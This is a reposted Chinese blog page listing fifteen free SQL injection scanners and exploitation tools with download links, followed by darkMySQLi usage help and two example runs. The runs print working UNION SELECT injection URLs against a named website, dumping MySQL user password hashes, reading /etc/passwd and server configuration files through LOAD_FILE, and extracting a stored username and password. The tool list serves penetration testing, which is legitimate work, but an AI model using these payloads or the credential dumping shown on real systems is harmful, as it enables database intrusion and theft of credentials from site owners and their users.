[转载]Top 15 free SQL Injection Scanners

本文汇总了多种用于发现和利用SQL注入漏洞的安全测试工具,包括SQLIer、SQLbftools、SQLInjectionBrute-forcer等。这些工具可以帮助安全研究人员自动化检测过程,深入探测应用程序中的SQL注入漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQLIer - SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. Get SQLIer.
Code:
http://bcable.net/project.php?sqlier
SQLbftools - SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Get SQLbftools.
Code:
http://www.reversing.org/node/view/11
SQL Injection Brute-forcer - SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Get SQLLibf.
Code:
http://www.open-labs.org/sqlibf19beta1.tar.gz
SQLBrute - SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Mcft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Get SQLBrute.
Code:
http://www.justinclarke.com/security/sqlbrute.py
BobCat - BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Get BobCat.
Code:
http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html
SQLMap - SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Get SQLMap.
Code:
http://sqlmap.sourceforge.net/
Absinthe - Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Get Absinthe.
Code:
http://www.0x90.org/releases/absinthe/download.php
SQL Injection Pen-testing Tool - The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Get SQL Injection Pen-testing tool.
Code:
http://sqltool.itdefence.ru/indexeng.html
SQID - SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.
Code:
http://sqid.rubyforge.org/
Blind SQL Injection Perl Tool - bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.
Code:
http://www.unsec.net/download/bsqlbf.pl
SQL Power Injection Injector - SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. Get SQL Power Injection.
Code:
http://www.sqlpowerinjector.com/
FJ-Injector Framwork - FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Get FJ-Injector Framework.
Code:
http://sourceforge.net/project/showfiles.php?group_id=183841
SQLNinja - SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Mcft SQL Server as its back-end database. Get SQLNinja.
Code:
http://sqlninja.sourceforge.net/
Automagic SQL Injector - The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Mcft SQL injection holes where errors are returned. Get Automagic SQL Injector.
Code:
http://www.indianz.ch/tools/attack/automagic.zip
NGSS SQL Injector - NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Get NGSS SQL Injector.
Code:
http://www.indianz.ch/tools/attack/sqlinjector.zip

转载于:https://www.cnblogs.com/HappyQQ/archive/2008/08/02/1258967.html

darkMySQLi v.1.0 rsauron@gmail.com Usage: ./darkMySQLi.py [options] Options: -h, --help shows this help message and exits -d, --debug display URL debug information Target: -u URL, --url=URL Target url Methodology: -b, --blind Use blind methodology (req: --string) -s, --string String to match in page when the query is valid Method: --method=PUT Select to use PUT method Modes: --dbs Enumerate databases MySQL v5+ --schema Enumerate Information_schema (req: -D, opt: -T) MySQL v5+ --full Enumerate all we can MySQL v5+ --info MySQL Server configuration MySQL v4+ --fuzz Fuzz Tables & Columns Names MySQL v4+ --findcol Find Column length MySQL v4+ --dump Dump database table entries (req: -T, opt: -D, -C, --start, --stop) MySQL v4+ Define: -D DB database to enumerate -T TBL database table to enumerate -C COL database table column to enumerate Optional: --where=COL,VALUE Use a where clause in your dump --orderby=COL Use a orderby clause in your dump --proxy=PROXY Use a HTTP proxy to connect to the target url --output=FILE.TXT Output results of tool to this file 实例: darkc0de:darkMySQLi rsauron$ ./darkMySQLi.py -u "http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4, 5,6,7,8,9,10" --info |--------------------------------------------------| | rsauron@gmail.com v1.0 | | 1/2009 darkMySQLi.py | | -- Multi Purpose MySQL Injection Tool -- | | Usage: darkMySQLi.py [options] | | -h help darkc0de.com | |--------------------------------------------------| [+] URL: http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10 [+] 14:06:17 [+] Evasion: /**/ -- [+] Cookie: None [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: db2889_rayner_en User: mysql2889@localhost Version: 5.0.32-Debian_7etch1-log [+] Do we have Access to MySQL Database: YES <-- w00t w00t [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a,password),3,4,5,6,7,8,9,10+FROM+mysql .user-- [+] Dumping MySQL user info. host:user:password [+] Number of users in the mysql.user table: 6 [0] localhost:root:N [1] dlx35341:root:N [2] localhost:debian-sys-maint:*0EF29B1AED94CC60062FED7F4DF2224A0C880A10 [3] localhost:mysql2908:*6F0D804E0EB35256C22367F95D8D1E31A4E5BAAD [4] localhost:mysql2970:*7351A8BF4BD4C9E8FD20109F24916B9C93ADBF83 [5] localhost:mysql2889:*8050739003BBDB60551FA99B5FFF34957C4F5F49 [+] Do we have Access to Load_File: YES <-- w00t w00t [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,10-- [+] Magic quotes are: OFF [+] Starting Load_File Fuzzer... [+] Number of system files to be fuzzed: 37 [!] Found /et@c/pa@sswd [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9,10-- [!] Found /et@c/hos@ts [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f686f737473),3,4,5,6,7,8,9,10-- [!] Found /et@c/m@otd [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f6d6f7464),3,4,5,6,7,8,9,10-- [!] Found /et@c/apach@e2/apache2.conf [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f617061636865322e 636f6e66),3,4,5,6,7,8,9,10-- [!] Found /et@c/apa@che2/httpd.conf [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f68747470642e636f 6e66),3,4,5,6,7,8,9,10-- [!] Found /et@c/ap@ache2/sites-available/default [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f73697465732d6176 61696c61626c652f64656661756c74),3,4,5,6,7,8,9,10-- [!] Found /et@c/m@ysql/my.cnf [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f6d7973716c2f6d792e636e66),3,4,5, 6,7,8,9,10-- [-] 14:06:43 [-] Total URL Requests: 48 [-] Done info dump with where clause option and debug turned on darkc0de:darkMySQLi rsauron$ ./darkMySQLi.py -u "http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4, 5,6,7,8,9,10" --dump -D db2889_rayner_en -T auth -C name,pass --where pass,ridley --debug |--------------------------------------------------| | rsauron@gmail.com v1.0 | | 1/2009 darkMySQLi.py | | -- Multi Purpose MySQL Injection Tool -- | | Usage: darkMySQLi.py [options] | | -h help darkc0de.com | |--------------------------------------------------| [+] URL: http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10 [+] 14:17:43 [+] Evasion: /**/ -- [+] Cookie: None [-] Proxy Not Given [+] Gathering MySQL Server Configuration... [debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x6461726b63306465,0x1e,version(),0x1e,user (),0x1e,database(),0x1e,0x6461726b63306465),3,4,5,6,7,8,9,10-- Database: db2889_rayner_en User: mysql2889@localhost Version: 5.0.32-Debian_7etch1-log [+] Dumping data from database "db2889_rayner_en" Table "auth" [+] and Column(s) ['name', 'pass'] [+] WHERE clause: WHERE+pass=0x7269646c6579 [+] ORDERBY clause: [debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x1e,0x1e,COUNT(*),0x1e,0x20),3,4,5,6,7,8,9 ,10/**/FROM/**/db2889_rayner_en.auth/**/WHERE/**/pass=0x7269646c6579-- [+] Number of Rows: 1 [debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x1e,0x1e,name,0x1e,pass,0x1e,0x1e,0x20),3, 4,5,6,7,8,9,10/**/FROM/**/db2889_rayner_en.auth/**/WHERE/**/pass=0x7269646c6579/**//**/LIMIT/**/0,1-- [1] rayneriol:ridley: [-] 14:17:45 [-] Total URL Requests: 3 [-] Done 具体用户请看提示帮助
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值